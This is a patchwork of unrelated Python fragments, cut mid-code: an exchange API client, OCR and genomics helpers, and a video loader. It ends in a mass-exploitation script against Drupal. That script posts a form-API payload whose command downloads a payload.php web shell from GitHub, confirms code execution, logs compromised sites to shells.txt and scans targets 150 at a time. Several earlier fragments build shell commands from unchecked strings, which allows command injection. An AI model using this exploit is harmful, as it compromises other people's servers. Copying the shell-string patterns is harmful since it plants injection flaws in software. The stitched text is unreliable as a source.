'/api/v1/depth' params = {'symbol': symbol} if limit: params['limit'] = limit return self.addReq('GET', path, params, self.onQueryDepth) #---------------------------------------------------------------------- def queryTrades(self, symbol, limit=0): """""" path = '/api/v1/trades' params = {'symbol': symbol} if limit: params['limit'] = limit return self.addReq('GET', path, params, self.onQueryTrades) #---------------------------------------------------------------------- def queryAggTrades(self, symbol, fromId=0, startTime=0, endTime=0, limit=0): """""" path = '/api/v1/aggTrades' params = {'symbol': symbol} if fromId: params['fromId'] = fromId if startTime: params['startTime'] = startTime if endTime: params['endTime'] = endTime if limit: params['limit'] = limit return self.addReq('GET', path, params, self.onQueryAggTrades) #---------------------------------------------------------------------- def queryKlines(self, symbol, interval, limit=0, startTime=0, endTime=0): """""" path = '/api/v1/klines' params = {'symbol': symbol, 'interval': interval} if limit: params['limit'] = limit if startTime: params['startTime'] = startTime if endTime: params['endTime'] = endTime return self.addReq('GET', path, params, self.onQueryKlines) #---------------------------------------------------------------------- def queryTicker24HR(self, symbol=''): """""" path = '/api/v1/ticker/24hr' params = {} if symbol: params['symbol'] = symbol return self.addReq('GET', path, params, self.onQueryTicker24HR) #---------------------------------------------------------------------- def queryTickerPrice(self, symbol=''): """""" path = '/api/v3/ticker/price' params = {} if symbol: params['symbol'] = symbol return self.addReq('GET', path, params, self.onQueryTickerPrice) #---------------------------------------------------------------------- def queryBookTicker(self, symbol=''): """""" path = '/api/v3/ticker/bookTicker' params = {} if symbol: params['symbol'] = symbol return self.addReq('GET', path, params, self.onQueryBookTicker) #---------------------------------------------------------------------- def newOrder(self, symbol, side, type_, price, quantity, timeInForce, newClientOrderId='', stopPrice=0, icebergQty=0, newOrderRespType=''): """""" path = '/api/v3/order' params = { 'symbol': symbol, 'side': side, 'type': type_, 'price': price, 'quantity': quantity, 'timeInForce': timeInForce } if newClientOrderId: params['newClientOrderId'] = newClientOrderId if timeInForce: params['timeInForce'] = timeInForce if stopPrice: params['stopPrice'] = stopPrice if icebergQty: params['icebergQty'] = icebergQty if newOrderRespType: params['newOrderRespType'] = newOrderRespType return self.addReq('POST', path, params, self.onNewOrder, signed=True) #---------------------------------------------------------------------- def queryOrder(self, symbol, orderId=0, origClientOrderId=0): """""" path = '/api/v3/order' params = {'symbol': symbol} if orderId: params['orderId'] = orderId if origClientOrderId: params['origClientOrderId'] = origClientOrderId return self.addReq('GET', path, params, self.onQueryOrder, signed=True) #---------------------------------------------------------------------- def cancelOrder(self, symbol, orderId=0, origClientOrderId='', newClientOrderId=''): """""" path = '/api/v3/order' params = {'symbol': symbol} if orderId: params['orderId'] = orderId if origClientOrderId: params['origClientOrderId'] = origClientOrderId if newClientOrderId: params['newClientOrderId'] = newClientOrderId return self.addReq('DELETE', path, params, self.onCancelOrder, signed=True) #---------------------------------------------------------------------- def queryOpenOrders(self, symbol=''): """""" path = '/api/v3/openOrders' params = {} if symbol: params['symbol'] = symbol return self.addReq('GET', path, params, self.onQueryOpenOrders, signed=True) #---------------------------------------------------------------------- def queryAllOrders(self, symbol, orderId=0, limit=0): """""" path = '/api/v3/allOrders' params = {'symbol': symbol} if orderId: params['orderId'] = orderId if limit: params['limit'] = limit return self.addReq('GET', path, params, self.onQueryAllOrders, signed=True) #---------------------------------------------------------------------- def queryAccount(self): """""" path = '/api/v3/account' params = {} return self.addReq('GET', path, params, self.onQueryAccount, signed=True) #---------------------------------------------------------------------- def queryMyTrades(self, symbol, limit=0, fromId=0): """""" path = '/api/v3/myTrades' params = {'symbol': symbol} if limit: params['limit'] = limit if fromId: params['fromId'] = fromId return self.addReq('GET', path, params, self.onQueryMyTrades, signed=True) #---------------------------------------------------------------------- def startStream(self): """""" path = '/api/v1/userDataStream' return self.addReq('POST', path, {}, self.onStartStream, signed=True, stream=True) #---------------------------------------------------------------------- def keepaliveStream(self, listenKey): """""" path = '/api/v1/userDataStream' params = {'listenKey': listenKey} return self.addReq('PUT', path, params, self.onKeepaliveStream, signed=True, stream=True) #---------------------------------------------------------------------- def closeStream(self, listenKey): """""" path = '/api/v1/userDataStream' params = {'listenKey': listenKey} return self.addReq('DELETE', path, params, self.onCloseStream, signed=True, stream=True) ################################################### ## REST Callback ################################################### #---------------------------------------------------------------------- def onError(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryPing(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryTime(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryExchangeInfo(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryDepth(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryTrades(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryAggTrades(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryKlines(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryTicker24HR(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryTickerPrice(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryBookTicker(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onNewOrder(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryOrder(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onCancelOrder(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryOpenOrders(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryAllOrders(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryAccount(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onQueryMyTrades(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onStartStream(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onKeepaliveStream(self, data, reqid): """""" print((data, reqid)) #---------------------------------------------------------------------- def onCloseStream(self, data, reqid): """""" print((data, reqid)) ################################################### ## Websocket Function ################################################### #---------------------------------------------------------------------- def initDataStream(self, nameList=None): """""" if nameList: self.dataStreamNameList = nameList s = '/'.join(self.dataStreamNameList) self.dataStreamUrl = DATASTREAM_ENDPOINT + s result = self.connectDataStream() if result: self.dataStreamActive = True self.dataStreamThread = Thread(target=self.runDataStream) self.dataStreamThread.start() #---------------------------------------------------------------------- def runDataStream(self): """""" while self.dataStreamActive: try: stream = self.dataStreamWs.recv() data = json.loads(stream) self.onMarketData(data) except: self.onDataStreamError('Data stream connection lost') result = self.connectDataStream() if not result: self.onDataStreamError(u'Waiting 3 seconds to reconnect') sleep(3) else: self.onDataStreamError(u'Data stream reconnected') #---------------------------------------------------------------------- def closeDataStream(self): """""" self.dataStreamActive = False self.dataStreamThread.join() #---------------------------------------------------------------------- def connectDataStream(self): """""" try: self.dataStreamWs = create_connection( self.dataStreamUrl, sslopt={'cert_reqs': ssl.CERT_NONE}) return True except: msg = traceback.format_exc() self.onDataStreamError('Connecting data stream falied: %s' % msg) return False #---------------------------------------------------------------------- def onDataStreamError(self, msg): """""" print(msg) #---------------------------------------------------------------------- def onMarketData(self, data): """""" print(data) #---------------------------------------------------------------------- def initUserStream(self, key): """""" self.userStreamKey = key self.userStreamUrl = USERSTREAM_ENDPOINT + key result = self.connectUserStream() if result: self.userStreamActive = True self.userStreamThread = Thread(target=self.runUserStream) self.userStreamThread.start() self.keepaliveThread = Thread(target=self.runKeepalive) self.keepaliveThread.start() #---------------------------------------------------------------------- def runUserStream(self): """""" while self.userStreamActive: try: stream = self.userStreamWs.recv() data = json.loads(stream) self.onUserData(data) except: self.onUserStreamError('User stream connection lost') result = self.connectUserStream() if not result: self.onUserStreamError(u'Waiting 3 seconds to reconnect') sleep(3) else: self.onUserStreamError(u'User stream reconnected') #---------------------------------------------------------------------- def closeUserStream(self): """""" self.userStreamActive = False self.userStreamThread.join() self.keepaliveThread.join() #---------------------------------------------------------------------- def connectUserStream(self): """""" try: self.userStreamWs = create_connection( self.userStreamUrl, sslopt={'cert_reqs': ssl.CERT_NONE}) return True except: msg = traceback.format_exc() self.onUserStreamError('Connecting user stream falied: %s' % msg) return False #---------------------------------------------------------------------- def onUserStreamError(self, msg): """""" print(msg) #---------------------------------------------------------------------- def onUserData(self, data): """""" print(data) #---------------------------------------------------------------------- def runKeepalive(self): """""" while self.userStreamActive: self.keepaliveCount += 1 if self.keepaliveCount >= 1800: self.keepaliveCount = 0 self.keepaliveStream(self.userStreamKey) sleep(1)
def multithread_processor(self, to_pdf=False, to_text=False, gen_images=False): def image_to_pdf(image_paths): for image_path in image_paths: print(image_path) if self.pdf_type == 'image': filename = '%s/%s-%s_1' % ( self.images_folder, self.filename, image_path.split('.')[-2].split('-')[-1]) else: filename = image_path.split('.png')[0] print(filename) os.system('tesseract --oem 1 -l eng --psm 6 %s %s pdf' % (image_path, filename)) return 0 def image_to_text(image_paths): for image_path in image_paths: print(image_path) filename = '%s/%s' % (self.images_folder, image_path.split('.')[0]) print(filename) os.system('tesseract --oem 1 -l eng --psm 6 %s %s' % (image_path, filename)) return 0 def generate_images(pages_list): for p_num in pages_list: print('Generating images %s' % p_num) convert_from_path(self.file_path, dpi=self.generate_images_dpi, output_folder=self.images_folder, first_page=p_num, last_page=p_num, fmt='png') print('Generating images completed %s' % p_num) return 0 if to_pdf: paths = glob.glob('%s/*.png' % self.images_folder) print(paths) def multi_run_wrapper(args): return image_to_pdf(*args) elif to_text: paths = glob.glob('%s/*.png' % self.images_folder) def multi_run_wrapper(args): return image_to_text(*args) elif gen_images: paths = list(range(1, self.pages + 1)) # pages_list def multi_run_wrapper(args): return generate_images(*args) def divide_range(seq, num): avg = len(seq) / float(num) out = list() last = 0.0 while last < len(seq): out.append([int(last), int(last + avg)]) last += avg return out arg_data = list() for n in divide_range(range(len(paths)), self.pool_size): final_list = paths[n[0]:n[1]] arg_data.append([final_list]) pool = Pool(self.pool_size) response_data = pool.map(multi_run_wrapper, arg_data) pool.close() pool.join() print('Done multiprocessing')
def calculate_express(snplst, pop, request, web, tissues, r2_d, genome_build, r2_d_threshold=0.1, p_threshold=0.1, window=500000): print("##### START LD EXPRESS CALCULATION #####") print("raw snplst", snplst) print("raw pop", pop) print("raw request", request) print("raw web", web) print("raw tissues", tissues) print("raw r2_d", r2_d) print("raw r2_d_threshold", r2_d_threshold) print("raw p_threshold", p_threshold) print("raw window", window) print("raw genome_build", genome_build) full_start = timer() # SNP limit max_list = 10 # Ensure tmp directory exists if not os.path.exists(tmp_dir): os.makedirs(tmp_dir) errors_warnings = {} # Validate genome build param if genome_build not in genome_build_vars['vars']: errors_warnings[ "error"] = "Invalid genome build. Please specify either " + ", ".join( genome_build_vars['vars']) + "." return ("", "", "", "", "", errors_warnings) # Validate window size is between 0 and 1,000,000 if window < 0 or window > 1000000: errors_warnings[ "error"] = "Window value must be a number between 0 and 1,000,000." return ("", "", "", "", "", errors_warnings) # Parse SNPs list snps_raw = snplst.split("+") # Generate error if # of inputted SNPs exceeds limit if len(snps_raw) > max_list: errors_warnings["error"] = "Maximum SNP list is " + \ str(max_list)+" RS numbers. Your list contains " + \ str(len(snps_raw))+" entries." return ("", "", "", "", "", errors_warnings) # Remove duplicate RS numbers sanitized_query_snps = [] for snp_raw in snps_raw: snp = snp_raw.strip() if snp not in sanitized_query_snps: sanitized_query_snps.append([snp]) # Connect to Mongo database if env == 'local': mongo_host = api_mongo_addr else: mongo_host = 'localhost' if web: client = MongoClient( 'mongodb://' + mongo_username + ':' + mongo_password + '@' + mongo_host + '/admin', mongo_port) else: if env == 'local': client = MongoClient( 'mongodb://' + mongo_username + ':' + mongo_password + '@' + mongo_host + '/admin', mongo_port) else: client = MongoClient('localhost', mongo_port) db = client["LDLink"] # Check if dbsnp collection in MongoDB exists, if not, display error if "dbsnp" not in db.list_collection_names(): errors_warnings[ "error"] = "dbSNP is currently unavailable. Please contact support." return ("", "", "", "", "", errors_warnings) # Select desired ancestral populations pops = pop.split("+") pop_dirs = [] for pop_i in pops: if pop_i in [ "ALL", "AFR", "AMR", "EAS", "EUR", "SAS", "ACB", "ASW", "BEB", "CDX", "CEU", "CHB", "CHS", "CLM", "ESN", "FIN", "GBR", "GIH", "GWD", "IBS", "ITU", "JPT", "KHV", "LWK", "MSL", "MXL", "PEL", "PJL", "PUR", "STU", "TSI", "YRI" ]: pop_dirs.append(data_dir + population_samples_dir + pop_i + ".txt") else: errors_warnings[ "error"] = pop_i + " is not an ancestral population. Choose one of the following ancestral populations: AFR, AMR, EAS, EUR, or SAS; or one of the following sub-populations: ACB, ASW, BEB, CDX, CEU, CHB, CHS, CLM, ESN, FIN, GBR, GIH, GWD, IBS, ITU, JPT, KHV, LWK, MSL, MXL, PEL, PJL, PUR, STU, TSI, or YRI." return ("", "", "", "", "", errors_warnings) # get_pops = "cat " + " ".join(pop_dirs) # proc = subprocess.Popen(get_pops, shell=True, stdout=subprocess.PIPE) # pop_list = [x.decode('utf-8') for x in proc.stdout.readlines()] get_pops = "cat " + " ".join( pop_dirs) + " > " + tmp_dir + "pops_" + request + ".txt" subprocess.call(get_pops, shell=True) pop_list = open(tmp_dir + "pops_" + request + ".txt").readlines() ids = [i.strip() for i in pop_list] pop_ids = list(set(ids)) # tissue_ids = tissue.split("+") # print("tissue_ids", tissue_ids) # Get rs number from genomic coordinates from dbsnp def get_rsnum(db, coord): temp_coord = coord.strip("chr").split(":") chro = temp_coord[0] pos = temp_coord[1] query_results = db.dbsnp.find({ "chromosome": str(chro), genome_build_vars[genome_build]['position']: str(pos) }) query_results_sanitized = json.loads(json_util.dumps(query_results)) return query_results_sanitized # Replace input genomic coordinates with variant ids (rsids) def replace_coords_rsid(db, snp_lst): new_snp_lst = [] for snp_raw_i in snp_lst: if snp_raw_i[0][0:2] == "rs": new_snp_lst.append(snp_raw_i) else: snp_info_lst = get_rsnum(db, snp_raw_i[0]) if snp_info_lst != None: if len(snp_info_lst) > 1: var_id = "rs" + snp_info_lst[0]['id'] ref_variants = [] for snp_info in snp_info_lst: if snp_info['id'] == snp_info['ref_id']: ref_variants.append(snp_info['id']) if len(ref_variants) > 1: var_id = "rs" + ref_variants[0] if "warning" in errors_warnings: errors_warnings["warning"] = errors_warnings["warning"] + \ ". Multiple rsIDs (" + ", ".join(["rs" + ref_id for ref_id in ref_variants]) + ") map to genomic coordinates " + snp_raw_i[0] else: errors_warnings[ "warning"] = "Multiple rsIDs (" + ", ".join( [ "rs" + ref_id for ref_id in ref_variants ] ) + ") map to genomic coordinates " + snp_raw_i[ 0] elif len(ref_variants) == 0 and len(snp_info_lst) > 1: var_id = "rs" + snp_info_lst[0]['id'] if "warning" in errors_warnings: errors_warnings["warning"] = errors_warnings["warning"] + \ ". Multiple rsIDs (" + ", ".join(["rs" + ref_id for ref_id in ref_variants]) + ") map to genomic coordinates " + snp_raw_i[0] else: errors_warnings[ "warning"] = "Multiple rsIDs (" + ", ".join( [ "rs" + ref_id for ref_id in ref_variants ] ) + ") map to genomic coordinates " + snp_raw_i[ 0] else: var_id = "rs" + ref_variants[0] new_snp_lst.append([var_id]) elif len(snp_info_lst) == 1: var_id = "rs" + snp_info_lst[0]['id'] new_snp_lst.append([var_id]) else: new_snp_lst.append(snp_raw_i) else: new_snp_lst.append(snp_raw_i) return new_snp_lst sanitized_query_snps = replace_coords_rsid(db, sanitized_query_snps) print("sanitized_query_snps", sanitized_query_snps) # Find genomic coords of query snps in dbsnp details = {} rs_nums = [] snp_pos = [] snp_coords = [] warn = [] # windowWarnings = [] queryWarnings = [] for snp_i in sanitized_query_snps: if (len(snp_i) > 0 and len(snp_i[0]) > 2): if (snp_i[0][0:2] == "rs" or snp_i[0][0:3] == "chr") and snp_i[0][-1].isdigit(): # query variant to get genomic coordinates in dbsnp snp_coord = get_coords(db, snp_i[0]) if snp_coord != None and snp_coord[ genome_build_vars[genome_build]['position']] != "NA": # check if variant is on chrY for genome build = GRCh38 if snp_coord['chromosome'] == "Y" and ( genome_build == "grch38" or genome_build == "grch38_high_coverage"): if "warning" in errors_warnings: errors_warnings["warning"] = errors_warnings["warning"] + \ ". " + "Input variants on chromosome Y are unavailable for GRCh38, only available for GRCh37 (" + "rs" + snp_coord['id'] + " = chr" + snp_coord['chromosome'] + ":" + snp_coord[genome_build_vars[genome_build]['position']] + ")" else: errors_warnings[ "warning"] = "Input variants on chromosome Y are unavailable for GRCh38, only available for GRCh37 (" + "rs" + snp_coord[ 'id'] + " = chr" + snp_coord[ 'chromosome'] + ":" + snp_coord[ genome_build_vars[genome_build] ['position']] + ")" warn.append(snp_i[0]) else: rs_nums.append(snp_i[0]) snp_pos.append(snp_coord[ genome_build_vars[genome_build]['position']]) temp = [ snp_i[0], str(snp_coord['chromosome']), int(snp_coord[genome_build_vars[genome_build] ['position']]) ] snp_coords.append(temp) else: # Generate warning if query variant is not found in dbsnp warn.append(snp_i[0]) queryWarnings.append([ snp_i[0], "NA", "Variant not found in dbSNP" + dbsnp_version + ", variant removed." ]) else: # Generate warning if query variant is not a genomic position or rs number warn.append(snp_i[0]) queryWarnings.append( [snp_i[0], "NA", "Not a valid SNP, variant removed."]) else: # Generate error for empty query variant errors_warnings["error"] = "Input list of RS numbers is empty" subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt", shell=True) return ("", "", "", "", "", errors_warnings) # Generate warnings for query variants not found in dbsnp if warn != []: if "warning" in errors_warnings: errors_warnings["warning"] = errors_warnings["warning"] + \ ". The following RS number(s) or coordinate(s) inputs have warnings: " + ", ".join(warn) else: errors_warnings[ "warning"] = "The following RS number(s) or coordinate(s) inputs have warnings: " + ", ".join( warn) # Generate errors if no query variants are valid in dbsnp if len(rs_nums) == 0: errors_warnings[ "error"] = "Input SNP list does not contain any valid RS numbers or coordinates. " + errors_warnings[ "warning"] subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt", shell=True) return ("", "", "", "", "", errors_warnings) thinned_snps = [] print("##### FIND GWAS VARIANTS IN WINDOW #####") # establish low/high window for each query snp # ex: window = 500000 # -/+ 500Kb = 500,000Bp = 1Mb = 1,000,000 Bp total combined_matched_snps = [] for snp_coord in snp_coords: find_window_ld_start = timer() (geno, queryVariantWarnings) = get_query_variant(snp_coord, pop_ids, str(request), genome_build) # print("geno", geno) # print("queryVariantWarnings", queryVariantWarnings) if (len(queryVariantWarnings) > 0): queryWarnings += queryVariantWarnings if (geno is not None): ###### SPLIT TASK UP INTO # PARALLEL SUBPROCESSES ###### # find query window snps via tabix, calculate LD and apply R2/D' thresholds windowChunkRanges = chunkWindow(snp_coord[2], window, num_subprocesses) ld_subprocess_commands = [] for subprocess_id in range(num_subprocesses): getWindowVariantsArgs = " ".join([ str(web), str(snp_coord[0]), str(snp_coord[1]), str(windowChunkRanges[subprocess_id][0]), str(windowChunkRanges[subprocess_id][1]), str(request), str(subprocess_id), str(r2_d), str(r2_d_threshold), str(genome_build) ]) # print("getWindowVariantsArgs", getWindowVariantsArgs) ld_subprocess_commands.append("python3 LDexpress_ld_sub.py " + getWindowVariantsArgs) ld_subprocesses = [ subprocess.Popen(command, shell=True, stdout=subprocess.PIPE) for command in ld_subprocess_commands ] # collect output in parallel pool = Pool(len(ld_subprocesses)) windowLDSubsets = pool.map(get_output, ld_subprocesses) pool.close() pool.join() # flatten pooled ld window results windowLDSubsetsFlat = [ val.decode('utf-8').strip().split("\t") for sublist in windowLDSubsets for val in sublist ] # print("windowLDSubsetsFlat length", len(windowLDSubsetsFlat)) find_window_ld_end = timer() # print("FIND WINDOW SNPS AND CALCULATE LD TIME ELAPSED:", str(find_window_ld_end - find_window_ld_start) + "(s)") # find gtex tissues for window snps via mongodb, apply p-value threshold query_window_tissues_start = timer() windowLDSubsetsChunks = np.array_split(windowLDSubsetsFlat, num_subprocesses) for subprocess_id in range(num_subprocesses): with open( tmp_dir + 'express_ld_' + str(subprocess_id) + '_' + str(request) + '.txt', 'w') as snpsLDFile: for snp_ld_data in windowLDSubsetsChunks[ subprocess_id].tolist(): snpsLDFile.write("\t".join(snp_ld_data) + "\n") tissues_subprocess_commands = [] for subprocess_id in range(num_subprocesses): getTissuesArgs = " ".join([ str(web), str(request), str(subprocess_id), str(p_threshold), str(tissues), str(genome_build) ]) tissues_subprocess_commands.append( "python3 LDexpress_tissues_sub.py " + getTissuesArgs) tissues_subprocesses = [ subprocess.Popen(command, shell=True, stdout=subprocess.PIPE) for command in tissues_subprocess_commands ] # getTissuesArgs = [] # for subprocess_id in range(num_subprocesses): # getTissuesArgs.append([windowLDSubsetsChunks[subprocess_id].tolist(), subprocess_id, p_threshold, tissue_ids, web]) # with Pool(processes=num_subprocesses) as pool: # tissueResultsSubsets = pool.map(get_tissues_sub, getTissuesArgs) # collect output in parallel pool = Pool(len(tissues_subprocesses)) tissueResultsSubsets = pool.map(get_output, tissues_subprocesses) pool.close() pool.join() # flatten pooled tissues results matched_snps = [ val.decode('utf-8').strip().split("\t") for sublist in tissueResultsSubsets for val in sublist ] # print("FINAL # RESULTS FOR", snp_coord[0], len(matched_snps)) if (len(matched_snps) > 0): # details[snp_coord[0]] = { # details["results"] = { # "aaData": matched_snps # } combined_matched_snps += matched_snps # add snp to thinned_snps thinned_snps.append(snp_coord[0]) else: queryWarnings.append([ snp_coord[0], "chr" + str(snp_coord[1]) + ":" + str(snp_coord[2]), "No entries in GTEx are identified using the LDexpress search criteria." ]) query_window_tissues_end = timer() print( "QUERY WINDOW TISSUES TIME ELAPSED:", str(query_window_tissues_end - query_window_tissues_start) + "(s)") # clean up tmp files generated by each query snp subprocess.call("rm " + tmp_dir + "*" + request + "*.vcf", shell=True) subprocess.call("rm " + tmp_dir + "express_ld_*_" + str(request) + ".txt", shell=True) # add full results details["results"] = {"aaData": combined_matched_snps} # find unique thinned genes and tissues thinned_genes = sorted( list(set(list(map(lambda row: row[5], combined_matched_snps))))) thinned_tissues = sorted( list(set(list(map(lambda row: row[7], combined_matched_snps))))) # # clean up tmp file(s) generated by each calculation subprocess.call("rm " + tmp_dir + "pops_" + request + ".txt", shell=True) details["queryWarnings"] = {"aaData": queryWarnings} # Check if thinned list is empty, if it is, display error if len(thinned_snps) < 1: errors_warnings[ "error"] = "No entries in GTEx are identified using the LDexpress search criteria." return ("", "", "", "", "", errors_warnings) full_end = timer() print("TIME ELAPSED:", str(full_end - full_start) + "(s)") print("##### LDEXPRESS COMPLETE #####") return (sanitized_query_snps, thinned_snps, thinned_genes, thinned_tissues, details, errors_warnings)
class AsyncVideoFeaturesLoaderBreakfast(): """ Load features for the video frames. """ def __init__(self, feats_path, target, n_frames_per_video, batch_size, n_feat_maps, feat_map_side_dim, n_threads=10): random.seed(101) np.random.seed(101) self.__feats_pathes = feats_path self.__n_frames_per_video = n_frames_per_video self.__n_feat_maps = n_feat_maps self.__feat_map_side_dim = feat_map_side_dim self.__batch_size = batch_size self.__y = target self.__is_busy = False self.__batch_features = None self.__batch_y = None self.__n_threads_in_pool = n_threads self.__pool = Pool(self.__n_threads_in_pool) def load_feats_in_batch(self, batch_number): self.__is_busy = True idx_batch = batch_number - 1 start_idx = idx_batch * self.__batch_size stop_idx = (idx_batch + 1) * self.__batch_size batch_feat_pathes = self.__feats_pathes[start_idx:stop_idx] batch_y = self.__y[start_idx:stop_idx] n_batch_feats = len(batch_feat_pathes) n_batch_y = len(batch_y) idxces = range(0, n_batch_feats) assert n_batch_feats == n_batch_y # parameters passed to the reading function params = [data_item for data_item in zip(idxces, batch_feat_pathes)] # set list of batch features before start reading batch_feats_shape = (n_batch_feats, self.__n_frames_per_video, self.__feat_map_side_dim, self.__feat_map_side_dim, self.__n_feat_maps) self.__batch_features = np.zeros(batch_feats_shape, dtype=np.float32) self.__batch_y = batch_y # start pool of threads self.__pool.map_async(self.__load_features, params, callback=self.__thread_pool_callback) def get_batch_data(self): if self.__is_busy: raise Exception( 'Sorry, you can\'t get features while threads are running!') else: return (self.__batch_features, self.__batch_y) def get_y(self): return self.__y def is_busy(self): return self.__is_busy def __thread_pool_callback(self, args): self.__is_busy = False def __load_features(self, params): idx_video = params[0] feats_path = params[1] video_name = feats_path.split('/')[-1] try: # load feature from file feats = utils.pkl_load(feats_path) n_feats = len(feats) assert n_feats == self.__n_frames_per_video, 'Sorry, wrong number of frames, expected: %d, got: %d' % ( self.__n_frames_per_video, n_feats) self.__batch_features[idx_video] = feats except Exception as exp: print('\nSorry, error in loading feature %s' % (feats_path)) print(exp) def shuffle_data(self): """ shuffle these data: self.__feats_pathes, self.__class_names, self.__y :return: """ n_samples = len(self.__feats_pathes) idx = range(n_samples) np.random.shuffle(idx) self.__feats_pathes = self.__feats_pathes[idx] self.__y = self.__y[idx] def close(self): self.__pool.close() self.__pool.terminate()
'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36' } def run(u): try: url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' r = requests.post(url, data=payload, verify=False, headers=headers) if 'Select Your File :' in requests.get(u + '/payload.php', verify=False, headers=headers).text: print(u, '==> RCE') with open('shells.txt', mode='a') as d: d.write(u + '/payload.php\n') else: print(u, "==> Not Vuln") except: pass mp = Pool(150) mp.map(run, target) mp.close() mp.join()